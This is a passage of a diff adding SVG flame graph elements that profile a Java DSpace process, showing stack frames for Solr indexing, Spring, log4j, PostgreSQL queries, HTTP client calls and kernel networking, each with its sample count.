+<title>org/springframework/beans/factory/support/AbstractBeanFactory:::getMergedLocalBeanDefinition (2 samples, 0.96%)</title><rect x="1031.9" y="341" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1034.91" y="351.5" ></text>
+</g>
+<g >
+<title>schedule (17 samples, 8.13%)</title><rect x="168.1" y="581" width="96.0" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="171.09" y="591.5" >schedule</text>
+</g>
+<g >
+<title>skb_copy_datagram_iter (2 samples, 0.96%)</title><rect x="264.1" y="629" width="11.3" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="267.07" y="639.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/PatternConverter:::format (1 samples, 0.48%)</title><rect x="506.8" y="293" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="509.84" y="303.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/ItemIterator:::nextByRow (2 samples, 0.96%)</title><rect x="422.2" y="421" width="11.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="425.15" y="431.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (1 samples, 0.48%)</title><rect x="992.4" y="101" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="995.39" y="111.5" ></text>
+</g>
+<g >
+<title>arrayof_jint_fill (1 samples, 0.48%)</title><rect x="591.5" y="277" width="5.7" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="594.53" y="287.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doReceiveResponse (1 samples, 0.48%)</title><rect x="1127.9" y="293" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1130.89" y="303.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (4 samples, 1.91%)</title><rect x="557.7" y="261" width="22.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="560.66" y="271.5" >[..</text>
+</g>
+<g >
+<title>org/apache/http/client/utils/URIBuilder:::buildString (1 samples, 0.48%)</title><rect x="1077.1" y="309" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1080.08" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::subAppend (3 samples, 1.44%)</title><rect x="495.6" y="309" width="16.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="498.55" y="319.5" ></text>
+</g>
+<g >
+<title>Interpreter (134 samples, 64.11%)</title><rect x="410.9" y="645" width="756.5" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="413.86" y="655.5" >Interpreter</text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (1 samples, 0.48%)</title><rect x="992.4" y="117" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="995.39" y="127.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (9 samples, 4.31%)</title><rect x="868.2" y="357" width="50.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="871.18" y="367.5" >org/a..</text>
+</g>
+<g >
+<title>update_process_times (1 samples, 0.48%)</title><rect x="631.1" y="245" width="5.6" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="634.05" y="255.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.48%)</title><rect x="659.3" y="229" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="662.28" y="239.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/logging/LogFactory:::getFactory (5 samples, 2.39%)</title><rect x="552.0" y="309" width="28.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="555.01" y="319.5" >o..</text>
+</g>
+<g >
+<title>org/dspace/servicemanager/spring/SpringServiceManager:::getServicesByType (12 samples, 5.74%)</title><rect x="986.7" y="389" width="67.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="989.75" y="399.5" >org/dsp..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/AbstractUpdateRequest:::process (8 samples, 3.83%)</title><rect x="1116.6" y="405" width="45.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1119.60" y="415.5" >org/..</text>
+</g>
+<g >
+<title>java/lang/reflect/Proxy:::newProxyInstance (1 samples, 0.48%)</title><rect x="777.8" y="357" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="780.85" y="367.5" ></text>
+</g>
+<g >
+<title>nft_do_chain_inet (1 samples, 0.48%)</title><rect x="382.6" y="277" width="5.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="385.63" y="287.5" ></text>
+</g>
+<g >
+<title>dequeue_entity (1 samples, 0.48%)</title><rect x="1150.5" y="69" width="5.6" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="1153.48" y="79.5" ></text>
+</g>
+<g >
+<title>__ip_queue_xmit (14 samples, 6.70%)</title><rect x="314.9" y="533" width="79.0" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="317.88" y="543.5" >__ip_queu..</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.96%)</title><rect x="653.6" y="357" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="656.64" y="367.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::next (3 samples, 1.44%)</title><rect x="670.6" y="373" width="16.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="673.57" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="1082.7" y="197" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1085.73" y="207.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (1 samples, 0.48%)</title><rect x="540.7" y="309" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="543.72" y="319.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::next (1 samples, 0.48%)</title><rect x="721.4" y="389" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="724.39" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.48%)</title><rect x="710.1" y="389" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="713.10" y="399.5" ></text>
+</g>
+<g >
+<title>do_sys_poll (2 samples, 0.96%)</title><rect x="1144.8" y="197" width="11.3" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1147.83" y="207.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (4 samples, 1.91%)</title><rect x="1167.4" y="725" width="22.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1170.42" y="735.5" >[..</text>
+</g>
+<g >
+<title>java/security/AccessController:::doPrivileged (3 samples, 1.44%)</title><rect x="518.1" y="309" width="17.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="521.13" y="319.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Bundle:::&lt;init&gt; (7 samples, 3.35%)</title><rect x="648.0" y="389" width="39.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="650.99" y="399.5" >org..</text>
+</g>
+<g >
+<title>schedule_hrtimeout_range_clock (1 samples, 0.48%)</title><rect x="930.3" y="85" width="5.6" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="933.29" y="95.5" ></text>
+</g>
+<g >
+<title>java/util/TimSort:::countRunAndMakeAscending (1 samples, 0.48%)</title><rect x="981.1" y="341" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="984.10" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::receiveResponseHeader (1 samples, 0.48%)</title><rect x="1127.9" y="245" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1130.89" y="255.5" ></text>
+</g>
+<g >
+<title>do_softirq.part.0 (5 samples, 2.39%)</title><rect x="360.0" y="421" width="28.3" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="363.05" y="431.5" >d..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.48%)</title><rect x="715.7" y="389" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="718.74" y="399.5" ></text>
+</g>
+<g >
+<title>dequeue_entity (1 samples, 0.48%)</title><rect x="168.1" y="517" width="5.6" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="171.09" y="527.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (14 samples, 6.70%)</title><rect x="783.5" y="357" width="79.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="786.49" y="367.5" >org/apach..</text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::isStale (4 samples, 1.91%)</title><rect x="1139.2" y="325" width="22.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1142.19" y="335.5" >o..</text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (24 samples, 11.48%)</title><rect x="26.9" y="517" width="135.5" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="29.94" y="527.5" >__intel_pmu_enabl..</text>
+</g>
+<g >
+<title>org/apache/http/protocol/RequestTargetHost:::process (1 samples, 0.48%)</title><rect x="1111.0" y="309" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1113.96" y="319.5" ></text>
+</g>
+<g >
+<title>pthread_cond_wait@@GLIBC_2.3.2 (24 samples, 11.48%)</title><rect x="26.9" y="741" width="135.5" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="29.94" y="751.5" >pthread_cond_wait..</text>
+</g>
+<g >
+<title>java/net/SocketTimeoutException:::&lt;init&gt; (2 samples, 0.96%)</title><rect x="1088.4" y="149" width="11.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1091.37" y="159.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (1 samples, 0.48%)</title><rect x="501.2" y="213" width="5.6" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="504.20" y="223.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/AbstractUpdateRequest:::process (14 samples, 6.70%)</title><rect x="862.5" y="389" width="79.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="865.54" y="399.5" >org/apach..</text>
+</g>
+<g >
+<title>org/springframework/core/env/StandardEnvironment:::customizePropertySources (10 samples, 4.78%)</title><rect x="552.0" y="325" width="56.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="555.01" y="335.5" >org/s..</text>
+</g>
+<g >
+<title>scheduler_tick (1 samples, 0.48%)</title><rect x="631.1" y="229" width="5.6" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="634.05" y="239.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::get (1 samples, 0.48%)</title><rect x="698.8" y="373" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="701.80" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/DefaultConnectionReuseStrategy:::keepAlive (1 samples, 0.48%)</title><rect x="783.5" y="341" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="786.49" y="351.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (4 samples, 1.91%)</title><rect x="1167.4" y="741" width="22.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1170.42" y="751.5" >[..</text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.48%)</title><rect x="1099.7" y="229" width="5.6" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1102.67" y="239.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractSessionInputBuffer:::fillBuffer (1 samples, 0.48%)</title><rect x="1156.1" y="277" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1159.12" y="287.5" ></text>
+</g>
+<g >
+<title>sun/net/spi/DefaultProxySelector:::select (1 samples, 0.48%)</title><rect x="1071.4" y="277" width="5.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="1074.44" y="287.5" ></text>
+</g>
+<g >
+<title>net_rx_action (5 samples, 2.39%)</title><rect x="360.0" y="373" width="28.3" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="363.05" y="383.5" >n..</text>
+</g>
+<g >
+<title>__netif_receive_skb (5 samples, 2.39%)</title><rect x="360.0" y="341" width="28.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="363.05" y="351.5" >_..</text>
+</g>
+<g >
+<title>ip_rcv_finish (3 samples, 1.44%)</title><rect x="365.7" y="293" width="16.9" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="368.69" y="303.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (1 samples, 0.48%)</title><rect x="704.4" y="341" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="707.45" y="351.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::requiresIndexing (11 samples, 5.26%)</title><rect x="1054.5" y="421" width="62.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1057.50" y="431.5" >org/ds..</text>
+</g>
+<g >
+<title>org/apache/commons/pool/impl/GenericKeyedObjectPool:::borrowObject (1 samples, 0.48%)</title><rect x="704.4" y="277" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="707.45" y="287.5" ></text>
+</g>
+<g >
+<title>ip_local_deliver_finish (3 samples, 1.44%)</title><rect x="365.7" y="261" width="16.9" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="368.69" y="271.5" ></text>
+</g>
+<g >
+<title>ipv4_conntrack_local (2 samples, 0.96%)</title><rect x="320.5" y="469" width="11.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="323.53" y="479.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.96%)</title><rect x="1088.4" y="197" width="11.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1091.37" y="207.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/SolrRequest:::getPath (1 samples, 0.48%)</title><rect x="862.5" y="357" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="865.54" y="367.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupTail:::match (1 samples, 0.48%)</title><rect x="992.4" y="149" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="995.39" y="159.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject:::getMetadata (4 samples, 1.91%)</title><rect x="625.4" y="405" width="22.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="628.41" y="415.5" >o..</text>
+</g>
+<g >
+<title>hrtimer_start_range_ns (1 samples, 0.48%)</title><rect x="1144.8" y="133" width="5.7" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="1147.83" y="143.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/entity/EntitySerializer:::serialize (13 samples, 6.22%)</title><rect x="789.1" y="261" width="73.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="792.14" y="271.5" >org/apac..</text>
+</g>
+<g >
+<title>jbyte_disjoint_arraycopy (1 samples, 0.48%)</title><rect x="851.2" y="165" width="5.7" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="854.24" y="175.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.96%)</title><rect x="1088.4" y="261" width="11.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1091.37" y="271.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/util/ClientUtils:::writeXML (7 samples, 3.35%)</title><rect x="873.8" y="293" width="39.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="876.83" y="303.5" >org..</text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (2 samples, 0.96%)</title><rect x="597.2" y="277" width="11.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="600.18" y="287.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::append (1 samples, 0.48%)</title><rect x="772.2" y="293" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="775.20" y="303.5" ></text>
+</g>
+<g >
+<title>vtable stub (1 samples, 0.48%)</title><rect x="602.8" y="245" width="5.7" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="605.82" y="255.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.48%)</title><rect x="715.7" y="357" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="718.74" y="367.5" ></text>
+</g>
+<g >
+<title>__vfprintf_internal (1 samples, 0.48%)</title><rect x="10.0" y="661" width="5.6" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="13.00" y="671.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (5 samples, 2.39%)</title><rect x="484.3" y="373" width="28.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="487.26" y="383.5" >o..</text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (2 samples, 0.96%)</title><rect x="760.9" y="341" width="11.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="763.91" y="351.5" ></text>
+</g>
+<g >
+<title>__kmalloc_reserve.isra.0 (1 samples, 0.48%)</title><rect x="309.2" y="581" width="5.7" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="312.23" y="591.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (13 samples, 6.22%)</title><rect x="789.1" y="293" width="73.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="792.14" y="303.5" >org/apac..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.48%)</title><rect x="715.7" y="293" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="718.74" y="303.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::query (2 samples, 0.96%)</title><rect x="653.6" y="373" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="656.64" y="383.5" ></text>
+</g>
+<g >
+<title>__skb_datagram_iter (2 samples, 0.96%)</title><rect x="264.1" y="613" width="11.3" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="267.07" y="623.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="1156.1" y="149" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1159.12" y="159.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.48%)</title><rect x="715.7" y="373" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="718.74" y="383.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (2 samples, 0.96%)</title><rect x="456.0" y="389" width="11.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="459.03" y="399.5" ></text>
+</g>
+<g >
+<title>__x64_sys_recvfrom (20 samples, 9.57%)</title><rect x="162.4" y="709" width="113.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="165.44" y="719.5" >__x64_sys_rec..</text>
+</g>
+<g >
+<title>reweight_entity (1 samples, 0.48%)</title><rect x="1150.5" y="37" width="5.6" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1153.48" y="47.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (4 samples, 1.91%)</title><rect x="1167.4" y="693" width="22.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1170.42" y="703.5" >[..</text>
+</g>
+<g >
+<title>org/dspace/content/Item:::getBundles (9 samples, 4.31%)</title><rect x="648.0" y="405" width="50.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="650.99" y="415.5" >org/d..</text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::predictBeanType (1 samples, 0.48%)</title><rect x="1048.9" y="325" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1051.85" y="335.5" ></text>
+</g>
+<g >
+<title>tcp_push (14 samples, 6.70%)</title><rect x="314.9" y="613" width="79.0" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="317.88" y="623.5" >tcp_push</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.48%)</title><rect x="721.4" y="341" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="724.39" y="351.5" ></text>
+</g>
+<g >
+<title>org/dspace/app/util/DailyFileAppender:::subAppend (1 samples, 0.48%)</title><rect x="772.2" y="277" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="775.20" y="287.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/ChunkedOutputStream:::close (1 samples, 0.48%)</title><rect x="1133.5" y="229" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1136.54" y="239.5" ></text>
+</g>
+<g >
+<title>ktime_get_ts64 (1 samples, 0.48%)</title><rect x="1099.7" y="197" width="5.6" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="1102.67" y="207.5" ></text>
+</g>
+<g >
+<title>__cgroup_bpf_run_filter_skb (1 samples, 0.48%)</title><rect x="343.1" y="469" width="5.7" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="346.11" y="479.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.48%)</title><rect x="958.5" y="373" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="961.52" y="383.5" ></text>
+</g>
+<g >
+<title>__ip_finish_output (7 samples, 3.35%)</title><rect x="348.8" y="469" width="39.5" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="351.76" y="479.5" >__i..</text>
+</g>
+<g >
+<title>__vfs_write (1 samples, 0.48%)</title><rect x="501.2" y="133" width="5.6" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="504.20" y="143.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap$ValueIterator:::next (1 samples, 0.48%)</title><rect x="958.5" y="325" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="961.52" y="335.5" ></text>
+</g>
+<g >
+<title>x86_pmu_enable (16 samples, 7.66%)</title><rect x="173.7" y="501" width="90.4" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="176.73" y="511.5" >x86_pmu_en..</text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ProxySelectorRoutePlanner:::determineRoute (1 samples, 0.48%)</title><rect x="1071.4" y="309" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1074.44" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/DefaultHttpResponseParser:::parseHead (1 samples, 0.48%)</title><rect x="1127.9" y="213" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1130.89" y="223.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractBeanFactory:::isTypeMatch (2 samples, 0.96%)</title><rect x="1043.2" y="341" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1046.21" y="351.5" ></text>
+</g>
+<g >
+<title>__vfprintf_internal (2 samples, 0.96%)</title><rect x="15.6" y="725" width="11.3" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="18.65" y="735.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/env/AbstractEnvironment:::&lt;init&gt; (16 samples, 7.66%)</title><rect x="518.1" y="341" width="90.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="521.13" y="351.5" >org/spring..</text>
+</g>
+<g >
+<title>org/dspace/core/PluginManager:::getNamedPlugin (1 samples, 0.48%)</title><rect x="608.5" y="373" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="611.47" y="383.5" ></text>
+</g>
+<g >
+<title>intel_tfa_pmu_enable_all (24 samples, 11.48%)</title><rect x="26.9" y="533" width="135.5" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="29.94" y="543.5" >intel_tfa_pmu_ena..</text>
+</g>
+<g >
+<title>java/lang/String:::intern (1 samples, 0.48%)</title><rect x="523.8" y="213" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="526.78" y="223.5" ></text>
+</g>
+<g >
+<title>iptable_security_hook (1 samples, 0.48%)</title><rect x="314.9" y="485" width="5.6" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="317.88" y="495.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::next (1 samples, 0.48%)</title><rect x="693.2" y="373" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="696.16" y="383.5" ></text>
+</g>
+<g >
+<title>sk_wait_data (17 samples, 8.13%)</title><rect x="168.1" y="629" width="96.0" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="171.09" y="639.5" >sk_wait_data</text>
+</g>
+<g >
+<title>default_wake_function (1 samples, 0.48%)</title><rect x="371.3" y="101" width="5.7" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="374.34" y="111.5" ></text>
+</g>
+<g >
+<title>inet6_recvmsg (20 samples, 9.57%)</title><rect x="162.4" y="661" width="113.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="165.44" y="671.5" >inet6_recvmsg</text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (1 samples, 0.48%)</title><rect x="1099.7" y="245" width="5.6" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="1102.67" y="255.5" ></text>
+</g>
+<g >
+<title>update_cfs_group (1 samples, 0.48%)</title><rect x="1150.5" y="53" width="5.6" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="1153.48" y="63.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::info (5 samples, 2.39%)</title><rect x="484.3" y="405" width="28.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="487.26" y="415.5" >o..</text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/DefaultClientConnection:::receiveResponseHeader (1 samples, 0.48%)</title><rect x="1127.9" y="261" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1130.89" y="271.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.48%)</title><rect x="1156.1" y="261" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1159.12" y="271.5" ></text>
+</g>
+<g >
+<title>activate_task (1 samples, 0.48%)</title><rect x="371.3" y="53" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="374.34" y="63.5" ></text>
+</g>
+<g >
+<title>sock_recvmsg (20 samples, 9.57%)</title><rect x="162.4" y="677" width="113.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="165.44" y="687.5" >sock_recvmsg</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.96%)</title><rect x="1088.4" y="181" width="11.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1091.37" y="191.5" ></text>
+</g>
+<g >
